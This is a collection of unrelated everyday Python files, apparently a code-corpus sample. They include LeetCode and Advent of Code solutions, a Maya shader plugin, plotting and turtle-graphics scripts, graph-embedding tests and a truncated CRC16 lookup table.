Replace the color of all of the aforementioned pixels with the newColor.
At the end, return the modified image.
Examples:
Input:
image = [[1,1,1],[1,1,0],[1,0,1]]
sr = 1, sc = 1, newColor = 2
Output: [[2,2,2],[2,2,0],[2,0,1]]
Explanation:
From the center of the image (with position (sr, sc) = (1, 1)), all pixels connected
by a path of the same color as the starting pixel are colored with the new color.
Note the bottom corner is not colored 2, because it is not 4-directionally connected
to the starting pixel.
'''
#Python3 Code:
class Solution:
def floodFill(self, image: List[List[int]], sr: int, sc: int, newColor: int) -> List[List[int]]:
#Solution 3 - BFS
old, m, n = image[sr][sc], len(image), len(image[0])
if old != newColor:
q = collections.deque([(sr, sc)])
while q:
i, j = q.popleft()
image[i][j] = newColor
for x, y in ((i - 1, j), (i + 1, j), (i, j - 1), (i, j + 1)):
if 0 <= x < m and 0 <= y < n and image[x][y] == old:
q.append((x, y))
return image
#Solution 2 - DFS
#经典的dfs方法,要保存一下指定位置的颜色再对该位置染色,
#并对其四个方向的相邻元素进行处理,如果颜色和以前的颜色相同即染色并递归调用。
color = image[sr][sc]
if color != newColor:
self.dfs(image, sr, sc, color, newColor)
return image
def dfs(self, image, i, j, color, newColor):
m, n = len(image), len(image[0])
if image[i][j] == color:
image[i][j] = newColor
if i >= 1:
self.dfs(image, i - 1, j, color, newColor)
if i + 1 < m:
self.dfs(image, i + 1, j, color, newColor)
if j >= 1:
self.dfs(image, i, j - 1, color, newColor)
if j + 1 < n:
self.dfs(image, i, j + 1, color, newColor)
#Solution - DFS
SR, SC = len(image), len(image[0])
color = image[sr][sc]
if color == newColor: return image
def dfs(r, c):
if image[r][c] == color:
image[r][c] = newColor
if r >= 1: dfs(r - 1, c)
if r < SR - 1: dfs(r + 1, c)
if c >= 1: dfs(r, c - 1)
if c < SC - 1: dfs(r, c + 1)
dfs(sr, sc)
return image
|
filepath = "sinhala.lexc"
RaNaroot = {}
with open(filepath) as fp:
for line in fp:
x=line.strip().split(' ')
if 'ල්්්්්්්්්්්්්්්්්්්්්්්ල' in x[0]:
RaNaroot[x[0]] = 0
filepath = "hunspell_roots"
with open(filepath) as fp:
for line in fp:
x=line.strip().split(' ')
if 'ල්ල' in x[0]:
RaNaroot[x[0]] = 0
filepath = "rootFile"
with open(filepath) as fp:
for line in fp:
x=line.strip().split(' ')
if 'ල්ල' in x[0]:
RaNaroot[x[0]] = 0
f = open('LLaWords', 'w')
for x in RaNaroot:
f.write(x+"\n")
f.close()
|
file = open('day5.txt')
numList = list(map(int, file.read().split("\n")))
# Parts 1 and 2
def getNumSteps(input):
count = 0
nextIndex = 0
nextValue = 0
insideLoop = True
while(insideLoop):
if count == 0:
nextIndex = input[0]
count += 1
input[0] += 1 if nextIndex < 3 else (-1)
# input[0] += 1
if abs(nextIndex) < len(input):
nextValue = input[nextIndex]
else:
insideLoop = False
return count
else:
nextIndex += nextValue
if abs(nextIndex) < len(input):
count += 1
nextValue = input[nextIndex]
input[nextIndex] += 1 if nextValue < 3 else (-1)
# input[nextIndex] += 1
else:
print("Are we out yet?")
insideLoop = False
return count
return count
print(getNumSteps(numList)) |
import sys
import maya.OpenMaya as OpenMaya
import maya.OpenMayaMPx as OpenMayaMPx
import maya.cmds as cmds
kPluginNodeName = "MitsubaDielectricShader"
kPluginNodeClassify = "shader/surface/"
kPluginNodeId = OpenMaya.MTypeId(0x87034)
class dielectric(OpenMayaMPx.MPxNode):
def __init__(self):
OpenMayaMPx.MPxNode.__init__(self)
mIntIOR = OpenMaya.MObject()
mExtIOR = OpenMaya.MObject()
mInteriorMaterial = OpenMaya.MObject()
mExteriorMaterial = OpenMaya.MObject()
mReflectance = OpenMaya.MObject()
mTransmittance = OpenMaya.MObject()
mOutColor = OpenMaya.MObject()
mOutTransparency = OpenMaya.MObject()
def compute(self, plug, block):
if plug == dielectric.mOutColor:
resultColor = OpenMaya.MFloatVector(0.0,0.0,0.0)
outColorHandle = block.outputValue( dielectric.mOutColor )
outColorHandle.setMFloatVector(resultColor)
outColorHandle.setClean()
elif plug == dielectric.mOutTransparency:
outTransHandle = block.outputValue( dielectric.mOutTransparency )
outTransHandle.setMFloatVector(OpenMaya.MFloatVector(0.75,0.75,0.75))
outTransHandle.setClean()
else:
return OpenMaya.kUnknownParameter
def nodeCreator():
return dielectric()
def nodeInitializer():
nAttr = OpenMaya.MFnNumericAttribute()
eAttr = OpenMaya.MFnEnumAttribute()
try:
dielectric.mInteriorMaterial = eAttr.create("interiorMaterial", "intmat")
eAttr.setKeyable(1)
eAttr.setStorable(1)
eAttr.setReadable(1)
eAttr.setWritable(1)
eAttr.addField("Use Value", 0)
eAttr.addField("Vacuum - 1.0", 1)
eAttr.addField("Helum - 1.00004", 2)
eAttr.addField("Hydrogen - 1.00013", 3)
eAttr.addField("Air - 1.00028", 4)
eAttr.addField("Carbon Dioxide - 1.00045", 5)
eAttr.addField("Water - 1.3330", 6)
eAttr.addField("Acetone - 1.36", 7)
eAttr.addField("Ethanol - 1.361", 8)
eAttr.addField("Carbon Tetrachloride - 1.461", 9)
eAttr.addField("Glycerol - 1.4729", 10)
eAttr.addField("Benzene - 1.501", 11)
eAttr.addField("Silicone Oil - 1.52045", 12)
eAttr.addField("Bromine - 1.661", 13)
eAttr.addField("Water Ice - 1.31", 14)
eAttr.addField("Fused Quartz - 1.458", 15)
eAttr.addField("Pyrex - 1.470", 16)
eAttr.addField("Acrylic Glass - 1.49", 17)
eAttr.addField("Polypropylene - 1.49", 18)
eAttr.addField("BK7 - 1.5046", 19)
eAttr.addField("Sodium Chloride - 1.544", 20)
eAttr.addField("Amber - 1.55", 21)
eAttr.addField("Pet - 1.575", 22)
eAttr.addField("Diamond - 2.419", 23)
# Default to
eAttr.setDefault(0)
dielectric.mIntIOR = nAttr.create("interiorIOR","intior", OpenMaya.MFnNumericData.kFloat, 1.3)
nAttr.setKeyable(1)
nAttr.setStorable(1)
nAttr.setReadable(1)
nAttr.setWritable(1)
dielectric.mExteriorMaterial = eAttr.create("exteriorMaterial", "extmat")
eAttr.setKeyable(1)
eAttr.setStorable(1)
eAttr.setReadable(1)
eAttr.setWritable(1)
eAttr.addField("Use Value", 0)
eAttr.addField("Vacuum - 1.0", 1)
eAttr.addField("Helum - 1.00004", 2)
eAttr.addField("Hydrogen - 1.00013", 3)
eAttr.addField("Air - 1.00028", 4)
eAttr.addField("Carbon Dioxide - 1.00045", 5)
eAttr.addField("Water - 1.3330", 6)
eAttr.addField("Acetone - 1.36", 7)
eAttr.addField("Ethanol - 1.361", 8)
eAttr.addField("Carbon Tetrachloride - 1.461", 9)
eAttr.addField("Glycerol - 1.4729", 10)
eAttr.addField("Benzene - 1.501", 11)
eAttr.addField("Silicone Oil - 1.52045", 12)
eAttr.addField("Bromine - 1.661", 13)
eAttr.addField("Water Ice - 1.31", 14)
eAttr.addField("Fused Quartz - 1.458", 15)
eAttr.addField("Pyrex - 1.470", 16)
eAttr.addField("Acrylic Glass - 1.49", 17)
eAttr.addField("Polypropylene - 1.49", 18)
eAttr.addField("BK7 - 1.5046", 19)
eAttr.addField("Sodium Chloride - 1.544", 20)
eAttr.addField("Amber - 1.55", 21)
eAttr.addField("Pet - 1.575", 22)
eAttr.addField("Diamond - 2.419", 23)
# Default to
eAttr.setDefault(0)
dielectric.mExtIOR = nAttr.create("exteriorIOR","extior", OpenMaya.MFnNumericData.kFloat, 1.0)
nAttr.setKeyable(1)
nAttr.setStorable(1)
nAttr.setReadable(1)
nAttr.setWritable(1)
dielectric.mReflectance = nAttr.createColor("specularReflectance", "sr")
nAttr.setKeyable(1)
nAttr.setStorable(1)
nAttr.setReadable(1)
nAttr.setWritable(1)
nAttr.setDefault(1.0,1.0,1.0)
dielectric.mTransmittance = nAttr.createColor("specularTransmittance","st")
nAttr.setKeyable(1)
nAttr.setStorable(1)
nAttr.setReadable(1)
nAttr.setWritable(1)
nAttr.setDefault(1.0,1.0,1.0)
dielectric.mOutColor = nAttr.createColor("outColor", "oc")
nAttr.setStorable(0)
nAttr.setHidden(0)
nAttr.setReadable(1)
nAttr.setWritable(0)
dielectric.mOutTransparency = nAttr.createColor("outTransparency", "op")
nAttr.setStorable(0)
nAttr.setHidden(0)
nAttr.setReadable(1)
nAttr.setWritable(0)
except:
sys.stderr.write("Failed to create attributes\n")
raise
try:
dielectric.addAttribute(dielectric.mInteriorMaterial)
dielectric.addAttribute(dielectric.mIntIOR)
dielectric.addAttribute(dielectric.mExteriorMaterial)
dielectric.addAttribute(dielectric.mExtIOR)
dielectric.addAttribute(dielectric.mReflectance)
dielectric.addAttribute(dielectric.mTransmittance)
dielectric.addAttribute(dielectric.mOutColor)
dielectric.addAttribute(dielectric.mOutTransparency)
except:
sys.stderr.write("Failed to add attributes\n")
raise
try:
dielectric.attributeAffects (dielectric.mTransmittance, dielectric.mOutTransparency)
except:
sys.stderr.write("Failed in setting attributeAffects\n")
raise
# initialize the script plug-in
def initializePlugin(mobject):
mplugin = OpenMayaMPx.MFnPlugin(mobject)
try:
mplugin.registerNode( kPluginNodeName, kPluginNodeId, nodeCreator,
nodeInitializer, OpenMayaMPx.MPxNode.kDependNode, kPluginNodeClassify )
except:
sys.stderr.write( "Failed to register node: %s" % kPluginNodeName )
raise
# uninitialize the script plug-in
def uninitializePlugin(mobject):
mplugin = OpenMayaMPx.MFnPlugin(mobject)
try:
mplugin.deregisterNode( kPluginNodeId )
except:
sys.stderr.write( "Failed to deregister node: %s" % kPluginNodeName )
raise
|
#!/usr/bin/env python3
# vim: set ai et ts=4 sw=4:
import matplotlib as mpl
import matplotlib.pyplot as plt
import matplotlib.dates as mdates
import datetime as dt
import csv
dates = []
values = {}
with open('ru-newreg.csv', newline = '') as f:
for row in csv.reader(f, delimiter = ',', quotechar = '"'):
if dates == []:
dates = [
dt.datetime.strptime(
"{}-01".format(d),
'%Y-%m-%d'
).date()
for d in row[1:]
]
continue
values[ row[0] ] = row[1:]
dpi = 80
fig = plt.figure(dpi = dpi, figsize = (512 / dpi, 384 / dpi) )
mpl.rcParams.update({'font.size': 10})
plt.title('RU New Domain Names Registration')
plt.xlabel('Year')
plt.ylabel('Domains')
ax = plt.axes()
ax.yaxis.grid(True)
ax.xaxis.set_major_formatter(mdates.DateFormatter('%Y'))
ax.xaxis.set_major_locator(mdates.YearLocator())
for reg in values.keys():
plt.plot(dates, values[reg], linestyle = 'solid', label = reg)
plt.legend(loc='upper left', frameon = False)
fig.savefig('domains.png')
|
from utils import Timer
from utils import Vec2
from utils import pi
import math
DAY=24
PART='a'
print("###############################")
print ("Running solution for day {d} part {p}".format(d=DAY, p=PART))
print("###############################")
timer = Timer()
# Write your code here
lines = []
result = 0
def get_final_tile(path):
options = ('e', 'se', 'sw', 'w', 'nw', 'ne')
start = Vec2(0, 0)
cur = ''
for c in path:
cur += c
if cur in options:
if cur == 'e':
start.add(1, 0)
elif cur == 'se':
start.add(1, 1)
elif cur == 'sw':
start.add(0, 1)
elif cur == 'w':
start.add(-1, 0)
elif cur == 'nw':
start.add(-1, -1)
elif cur == 'ne':
start.add(0, -1)
cur = ''
return start
with open('files/day{day}.txt'.format(day=DAY), 'r') as f:
lines = [l.strip() for l in f.readlines()]
tiles = {}
for l in lines:
tile = get_final_tile(l)
if tile.get_tuple() in tiles:
tiles[tile.get_tuple()] = not tiles[tile.get_tuple()]
else:
tiles[tile.get_tuple()] = True
result = sum([1 if tiles[tile] else 0 for tile in tiles])
print ("Result = {result}".format(result=result))
# And stop here
execution_time = timer.stop()
print("###############################")
print("Executed in {t} seconds".format(t=execution_time))
print("###############################") |
from collections import defaultdict
class Graph:
def __init__(self, vertices):
self.V = vertices
self.graph = defaultdict(list)
def insert(self,u,v):
self.graph[u].append(v)
def traverse(self, v, visited):
visited[v] = True
for i in self.graph[v]:
if visited[i] == False:
self.traverse(i, visited)
def findMotherVertex(self):
mv = []
visited = [False]*(self.V)
v = 0
for i in range(self.V):
if visited[i] == False:
self.traverse(i, visited)
v = i
visited = [False]*(self.V)
self.traverse(v, visited)
if all(i == True for i in visited):
mv.append(v)
if len(mv)>0:
return mv
else:
return -1
# test change for smartgit
g = Graph(7)
g.insert(0,1)
g.insert(0,2)
g.insert(1,3)
g.insert(4,1)
g.insert(6,4)
g.insert(5,6)
g.insert(5,2)
g.insert(6,0)
print(g.findMotherVertex())
g = Graph(4)
g.insert(2,1)
g.insert(2,0)
g.insert(1,2)
g.insert(0,2)
g.insert(0,3)
g.insert(3,3)
print(g.findMotherVertex())
|
import turtle
turtle.mode("logo")
turtle.tracer(False)
turtle.shape("turtle")
turtle.colormode(255)
# 画栅栏
def zhalan(x,y,chang,gao):
turtle.pu()
turtle.seth(0)
turtle.goto(x,y)
turtle.pd()
turtle.fillcolor(255,255,255)
turtle.begin_fill()
turtle.forward(gao)
turtle.right(90)
turtle.forward(chang)
turtle.right(90)
turtle.forward(gao)
turtle.right(90)
turtle.forward(chang)
turtle.end_fill()
def zhalan_all( ):
zhalan(-216,-10,130,15)
zhalan(-216,-40,130,15)
zhalan(-190,-60,15,80)
zhalan(-160,-60,15,80)
zhalan(-130,-60,15,80)
# 画云
def yun(x,y):
#turtle.bgcolor(0,255,255)
# 背景,用bgcolor 会闪
turtle.goto(-480,-60)
turtle.seth(90)
turtle.fillcolor(0,255,255)
turtle.begin_fill()
turtle.pd()
turtle.forward(960)
turtle.left(90)
turtle.forward(470)
turtle.left(90)
turtle.forward(960)
turtle.left(90)
turtle.forward(470)
turtle.end_fill()
turtle.pu()
turtle.seth(0)
turtle.pencolor("white")
turtle.goto(x,y)
turtle.fillcolor(255,255,255)
turtle.begin_fill()
turtle.pd()
turtle.circle(30, 90)
turtle.right(90)
turtle.circle(30, 180)
turtle.right(90)
turtle.circle(30, 90)
turtle.left(90)
turtle.goto(x,y)
turtle.end_fill()
turtle.pensize(1)
# 画地面
def dimian():
turtle.pu()
turtle.seth(0)
turtle.pensize(0)
turtle.goto(-480,-60)
turtle.fillcolor(255,144,48)
turtle.begin_fill()
turtle.pd()
turtle.right(90)
turtle.forward(960)
turtle.right(90)
turtle.forward(340)
turtle.right(90)
turtle.forward(960)
turtle.right(90)
turtle.forward(340)
turtle.end_fill()
turtle.pu()
turtle.pencolor("black")
for i in range(10):
turtle.goto(30+i*i,-59.5)
turtle.pd()
turtle.dot(5)
# 画身体
def shenti():
turtle.pu()
turtle.seth(90)
turtle.goto(100,-45)
turtle.pensize(1)
turtle.fillcolor(255,255,96)
turtle.pd()
turtle.begin_fill()
turtle.circle(30,360)
turtle.end_fill()
# 画左脚
def left(x,y):
turtle.pu()
turtle.goto(x,y)
turtle.seth(195)
turtle.pd()
turtle.forward(15)
# 画右脚
def right(x,y):
turtle.pu()
turtle.goto(x,y)
turtle.pd()
turtle.seth(165)
turtle.forward(15)
# 画头
def bgpic():
yun(42,205)
zhalan_all()
dimian()
shenti()
left(90,-43)
right(105,-45)
def head(x,y):
turtle.pu()
turtle.seth(330)
turtle.goto(x,y)
turtle.pd()
turtle.fillcolor(255,255,96)
turtle.begin_fill()
turtle.circle(15,360)
turtle.end_fill()
# 画嘴
def mouth(x,y):
turtle.pu()
turtle.goto(x,y)
turtle.pd()
turtle.fillcolor(192,96,48)
turtle.begin_fill()
turtle.seth(165)
turtle.forward(18)
turtle.seth(15)
turtle.forward(18)
turtle.end_fill()
# 画眼睛
def eye(x,y):
turtle.pu()
turtle.seth(90)
turtle.goto(x,y)
turtle.fillcolor(0,0,0)
turtle.begin_fill()
turtle.pd()
turtle.circle(1,360)
turtle.end_fill()
# 低头
def ditou():
turtle.clear()
bgpic()
head(68,-21)
mouth(51,-42)
eye(52,-30)
turtle.hideturtle()
turtle.update()
# 抬头
def taitou():
turtle.clear()
bgpic()
head(68,-10)
mouth(47,-31)
eye(53,-15)
turtle.hideturtle()
turtle.update()
taitou()
# 按键交互
turtle.onkeypress(ditou, 'space')
turtle.onkeyrelease(taitou, 'space')
turtle.listen()
turtle.done()
|
from itertools import product
from typing import Union
from model.actions import Action
from model.cards import Card
class State:
def __init__(self,
current_sum: int,
opponent_points: int,
holds_usable_ace: bool):
self.current_sum = current_sum
self.opponent_points = opponent_points
self.holds_usable_ace = holds_usable_ace
@classmethod
def from_deal(cls, first_card: Card, second_card: Card, opponent_hand: Union[Card, int]):
current_sum = first_card + second_card
if current_sum == 22:
current_sum = 12
return State(current_sum=current_sum,
opponent_points=opponent_hand,
holds_usable_ace=(first_card == Card.ACE or second_card == Card.ACE))
def __eq__(self, other):
if isinstance(other, State):
return self.current_sum == other.current_sum and \
self.opponent_points == other.opponent_points and \
self.holds_usable_ace == other.holds_usable_ace
return False
def __hash__(self):
return hash(tuple(sorted(self.__dict__.items())))
def move_with(self, card: Card):
if card != Card.ACE:
new_sum = self.current_sum + card
if new_sum > 21 and self.holds_usable_ace:
return State(new_sum - 10, self.opponent_points, False)
elif new_sum > 21:
return BUST
return State(new_sum, self.opponent_points, self.holds_usable_ace)
elif self.current_sum < 11:
return State(self.current_sum + 11, self.opponent_points, True)
elif self.current_sum >= 21 and not self.holds_usable_ace:
return BUST
elif self.current_sum >= 21 and self.holds_usable_ace:
return State(self.current_sum - 9, self.opponent_points, False)
else:
return State(self.current_sum + 1, self.opponent_points, self.holds_usable_ace)
@classmethod
def get_all_demanding_states(cls):
return [State(current_sum=current_sum,
opponent_points=opponent_points,
holds_usable_ace=holds_usable_ace)
for current_sum, opponent_points, holds_usable_ace
in product(range(12, 22), Card.get_values(), [True, False])]
@classmethod
def get_all_states(cls):
return [State(current_sum=current_sum,
opponent_points=opponent_points,
holds_usable_ace=holds_usable_ace)
for current_sum, opponent_points, holds_usable_ace
in product(range(2, 22), Card.get_values(), [True, False])]
BUST = State(None, None, None)
class StateActionPair:
def __init__(self, state: State, action: Action):
self.state = state
self.action = action
def __eq__(self, other):
if isinstance(other, StateActionPair):
return self.state == other.state and self.action == other.action
return False
def __hash__(self):
return hash(tuple(sorted(self.__dict__.items())))
|
__author__ = 'georg.michlits'
filename_1 = input('enter filename_2 (path): ')
filename_2 = input('enter filename_1 (path): ')
file_merge_name = input('enter merged file_filename: ')
file1 = open(filename_1,'r')
file2 = open(filename_2,'r')
file_merge = open(file_merge_name,'w')
print('reading in file1')
for line in file1:
file_merge.write(line)
print('finished')
print('reading in file2')
for line in file2:
file_merge.write(line)
file1.close()
file2.close()
file_merge.close()
print('finished')
|
# def max_pairwise_product(numbers):
#
# n = len(numbers)
# max_product = 0
# for first in range(n):
# for second in range(first + 1, n):
# multiplication_in_between = numbers[first] * numbers[second]
# max_product = max(max_product, multiplication_in_between)
# return max_product
def optimal_pairwise(numbers):
n = len(numbers)
numbers.sort()
firstmax = max(numbers)
secondmax = numbers[-2]
max_product = int(float(firstmax * secondmax))
return max_product
if __name__ == '__main__':
provided_numbers = int(float(input()))
converted_numbers_toIntegers = [int(float(x)) for x in input().split()]
# print(max_pairwise_product(converted_numbers_toIntegers))
print('the test', optimal_pairwise(converted_numbers_toIntegers))
|
import clr
import sys
import System
sys.path.append(r'E:\code\vs\Console\TestDLL\bin\Debug')
d = clr.AddReference('TestDLL')
from TestDLL import *
m = MasterImpl()
s = m.GetString()
print(s)
m.SetMessage("Hello Python")
s = m.GetString()
print(s)
# 调用返回byte
a = b'1234'
print(a)
print(str(a, encoding="utf-8"))
meta = m.GetMeta(a)
b = meta.get_value()
lb = bytes(b)
print(lb)
s = str(lb, encoding="utf-8")
print(s)
# Event
def handler(source,args):
print(a.PackageMessage)
def handler(source, args):
print('my_handler called!')
m.packageEventHandller += handler
m.packageEventHandller += lambda s,a: print("lambda event")
m.GetString()
#exception
try:
m.Raise()
except TestException as e:
print(e.Message)
print("ok") |
# BlueGraph: unifying Python framework for graph analytics and co-occurrence analysis.
# Copyright 2020-2021 Blue Brain Project / EPFL
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from bluegraph.backends.stellargraph import StellarGraphNodeEmbedder
from bluegraph.backends.neo4j import (Neo4jNodeEmbedder, pgframe_to_neo4j,
Neo4jGraphView)
def _execute(driver, query):
session = driver.session()
result = session.run(query)
result = result.data()
session.close()
return result
def _get_embedding_props(neo4j_driver, node_label, prop_name):
query = (
f"MATCH (n:{node_label}) "
f"RETURN n.id as node_id, n.{prop_name} as emb"
)
result = _execute(neo4j_driver, query)
return {el["node_id"]: el["emb"] for el in result}
def test_stellar_node_embedder(node_embedding_test_graph,
node_embedding_prediction_test_graph):
embedder = StellarGraphNodeEmbedder(
"node2vec", length=10, number_of_walks=20)
embedding = embedder.fit_model(
node_embedding_test_graph)
embedder = StellarGraphNodeEmbedder(
"complex", embedding_dimension=6, epochs=5)
embedding = embedder.fit_model(
pgframe=node_embedding_test_graph)
assert(len(embedding["embedding"].iloc[0]) == 6)
assert(
set(node_embedding_test_graph.nodes()) ==
set(embedding.index))
embedder = StellarGraphNodeEmbedder(
"distmult", embedding_dimension=10, epochs=5)
embedding = embedder.fit_model(
pgframe=node_embedding_test_graph)
assert(len(embedding["embedding"].iloc[0]) == 10)
assert(
set(node_embedding_test_graph.nodes()) ==
set(embedding.index))
embedder = StellarGraphNodeEmbedder(
"attri2vec", feature_props=["age", "height", "weight"],
embedding_dimension=3, epochs=5,
length=5, number_of_walks=3)
node_embedding_test_graph.nodes(raw_frame=True)
embedding = embedder.fit_model(pgframe=node_embedding_test_graph)
assert(len(embedding["embedding"].iloc[0]) == 3)
assert(
set(node_embedding_test_graph.nodes()) ==
set(embedding.index))
embeddings = embedder.predict_embeddings(
node_embedding_prediction_test_graph
)
assert(len(embeddings) == 4)
assert(
set(node_embedding_prediction_test_graph.nodes()) ==
set(embeddings.index))
embedder = StellarGraphNodeEmbedder(
"graphsage", feature_props=["age", "height", "weight"],
embedding_dimension=3, epochs=5,
length=5, number_of_walks=3)
node_embedding_test_graph.nodes(raw_frame=True)
embedding = embedder.fit_model(
pgframe=node_embedding_test_graph)
assert(len(embedding["embedding"].iloc[0]) == 3)
assert(
set(node_embedding_test_graph.nodes()) ==
set(embedding.index))
embeddings = embedder.predict_embeddings(
node_embedding_prediction_test_graph
)
assert(len(embeddings) == 4)
assert(
set(node_embedding_prediction_test_graph.nodes()) ==
set(embeddings.index))
embedder.save("stellar_sage_emedder", compress=True)
embedder = StellarGraphNodeEmbedder.load(
"stellar_sage_emedder.zip")
embedder.info()
embedder = StellarGraphNodeEmbedder(
"gcn_dgi", feature_props=["age", "height", "weight"],
batch_size=4, embedding_dimension=5)
embedding = embedder.fit_model(
node_embedding_test_graph)
assert(len(embedding["embedding"].iloc[0]) == 5)
assert(
set(node_embedding_test_graph.nodes()) ==
set(embedding.index))
embedder = StellarGraphNodeEmbedder(
"cluster_gcn_dgi", feature_props=["age", "height", "weight"],
batch_size=4, embedding_dimension=5, clusters=4, clusters_q=2)
embeddings = embedder.fit_model(
node_embedding_test_graph)
assert(len(embedding["embedding"].iloc[0]) == 5)
assert(
set(node_embedding_test_graph.nodes()) ==
set(embedding.index))
embeddings = embedder.predict_embeddings(
node_embedding_prediction_test_graph)
assert(len(embeddings) == 4)
assert(
set(node_embedding_prediction_test_graph.nodes()) ==
set(embeddings.index))
embedder = StellarGraphNodeEmbedder(
"gat_dgi", feature_props=["age", "height", "weight"],
batch_size=4, embedding_dimension=5)
embeddings = embedder.fit_model(
node_embedding_test_graph)
assert(len(embedding["embedding"].iloc[0]) == 5)
assert(
set(node_embedding_test_graph.nodes()) ==
set(embedding.index))
embedder = StellarGraphNodeEmbedder(
"cluster_gat_dgi", feature_props=["age", "height", "weight"],
batch_size=4, embedding_dimension=5, clusters=4, clusters_q=2)
embeddings = embedder.fit_model(
node_embedding_test_graph)
assert(len(embeddings["embedding"].iloc[0]) == 5)
assert(
set(node_embedding_test_graph.nodes()) ==
set(embeddings.index))
embeddings = embedder.predict_embeddings(
node_embedding_prediction_test_graph)
assert(len(embeddings) == 4)
assert(
set(node_embedding_prediction_test_graph.nodes()) ==
set(embeddings.index))
embedder = StellarGraphNodeEmbedder(
"graphsage_dgi", feature_props=["age", "height", "weight"],
batch_size=4, embedding_dimension=5)
embedding = embedder.fit_model(
node_embedding_test_graph)
assert(len(embedding["embedding"].iloc[0]) == 5)
assert(
set(node_embedding_test_graph.nodes()) ==
set(embedding.index))
def test_neo4j_node_embedder(node_embedding_test_graph,
node_embedding_prediction_test_graph,
neo4j_driver):
node_label = "TestPerson"
edge_label = "TEST_KNOWS"
# Populate neo4j with the test property graph
pgframe_to_neo4j(
pgframe=node_embedding_test_graph, driver=neo4j_driver,
node_label=node_label, edge_label=edge_label)
# Testing node2vec stream
embedder = Neo4jNodeEmbedder(
"node2vec",
embeddingDimension=6, walkLength=20, iterations=1,
edge_weight="weight")
embedding = embedder.fit_model(
driver=neo4j_driver, node_label=node_label, edge_label=edge_label)
assert(len(embedding["embedding"].iloc[0]) == 6)
# Alternatively, create a graph view
graph_view = Neo4jGraphView(
neo4j_driver, node_label=node_label, edge_label=edge_label)
# Testing node2vec write
embedder.fit_model(
graph_view=graph_view,
write=True, write_property="node2vec")
emb = _get_embedding_props(neo4j_driver, node_label, "node2vec")
assert(len(emb) == 7)
assert(set(embedding.index) == set(emb.keys()))
# Testing fastrp stream
embedder = Neo4jNodeEmbedder(
"fastrp", embeddingDimension=25,
edge_weight="weight")
embedding = embedder.fit_model(graph_view=graph_view)
assert(len(embedding["embedding"].iloc[0]) == 25)
# Testing fastrp write
embedding = embedder.fit_model(
graph_view=graph_view,
write=True, write_property="fastrp")
emb = _get_embedding_props(neo4j_driver, node_label, "fastrp")
assert(len(list(emb.values())[0]) == 25)
# Testing GraphSage train and stream predict
embedder = Neo4jNodeEmbedder(
"graphsage", feature_props=["age", "height", "weight"],
embeddingDimension=3)
embedding = embedder.fit_model(graph_view=graph_view)
assert(len(emb) == 7)
assert(set(embedding.index) == set(emb.keys()))
assert(len(embedding["embedding"].iloc[0]) == 3)
# Testing GraphSage write predicts (passing all the credentials)
embedder.predict_embeddings(
pgframe=node_embedding_prediction_test_graph,
driver=neo4j_driver,
node_label="TestPredictPerson",
edge_label="TEST_PREDICT_KNOWS",
write=True, write_property="graphsage"
)
emb = _get_embedding_props(neo4j_driver, "TestPredictPerson", "fastrp")
assert(len(emb) == 4)
assert(
set(node_embedding_prediction_test_graph.nodes()) ==
set(emb.keys()))
test_graph_view = Neo4jGraphView(
neo4j_driver,
node_label="TestPredictPerson",
edge_label="TEST_PREDICT_KNOWS")
# Testing GraphSage write predicts (passing graph view)
embedder.predict_embeddings(
graph_view=test_graph_view,
write=True, write_property="graphsage"
)
emb = _get_embedding_props(neo4j_driver, "TestPredictPerson", "fastrp")
assert(len(emb) == 4)
assert(
set(node_embedding_prediction_test_graph.nodes()) ==
set(emb.keys()))
embedder.save("neo4j_sage_emedder", compress=True)
embedder = Neo4jNodeEmbedder.load("neo4j_sage_emedder.zip")
embedder.info()
|
from PyQt5.QtGui import QColor, QPixmap
from PyQt5.QtWidgets import QApplication, QSplashScreen, QMainWindow
from PyQt5.QtCore import Qt
# Generate the splash screen
class SplashScreen:
def __init__(self, parent, image=None, after=None):
self.app = parent
image = QPixmap(image)
image = image.scaled(500, 500, Qt.KeepAspectRatio, Qt.SmoothTransformation)
self.splash = QSplashScreen(image, Qt.FramelessWindowHint | Qt.WindowStaysOnTopHint)
self.splash.setMask(image.mask())
self.after = after
def set_after(self, after):
self.after = after
def __enter__(self):
self.splash.show()
self.app.processEvents()
return self
def __exit__(self, exc_type, exc_value, traceback):
self.after.show()
self.splash.finish(self.after)
def status_update(self, msg):
self.splash.showMessage(msg, alignment=Qt.AlignHCenter, color=QColor(235, 239, 242))
self.app.processEvents()
class Application(QApplication):
pass
|
"""A collection of Pacman CRCField compatible CRC algorithms"""
import binascii
#==============================================================================
# CRC16 CCITT
#==============================================================================
# Table driver crc16 algorithm. The table is well-documented and was
# generated in this case by using pycrc (https://github.com/tpircher/pycrc)
# using the following command-line:
#
# ./pycrc.py --model=ccitt --generate table
CRC16_CCITT_TAB = \
[
0x0000, 0x1021, 0x2042, 0x3063, 0x4084, 0x50a5, 0x60c6, 0x70e7,
0x8108, 0x9129, 0xa14a, 0xb16b, 0xc18c, 0xd1ad, 0xe1ce, 0xf1ef,
0x1231, 0x0210, 0x3273, 0x2252, 0x52b5, 0x4294, 0x72f7, 0x62d6,
0x9339, 0x8318, 0xb37b, 0xa35a, 0xd3bd, 0xc39c, 0xf3ff, 0xe3de,
0x2462, 0x3443, 0x0420, 0x1401, 0x64e6, 0x74c7, 0x44a4, 0x5485,
0xa56a, 0xb54b, 0x8528, 0x9509, 0xe5ee, 0xf5cf, 0xc5ac, 0xd58d,
0x3653, 0x2672, 0x1611, 0x0630, 0x76d7, 0x66f6, 0x5695, 0x46b4,
0xb75b, 0xa77a, 0x9719, 0x8738, 0xf7df, 0xe7fe, 0xd79d, 0xc7bc,
0x48c4, 0x58e5, 0x6886, 0x78a7, 0x0840, 0x1861, 0x2802, 0x3823,
0xc9cc, 0xd9ed, 0xe98e, 0xf9af, 0x8948, 0x9969, 0xa90a, 0xb92b,
0x5af5, 0x4ad4, 0x7ab7, 0x6a96, 0x1a71, 0x0a50, 0x3a33, 0x2a12,
0xdbfd, 0xcbdc, 0xfbbf, 0xeb9e, 0x9b79, 0x8b58, 0xbb3b, 0xab1a,
0x6ca6, 0x7c87, 0x4ce4, 0x5cc5, 0x2c22, 0x3c03, 0x0c60, 0x1c41,
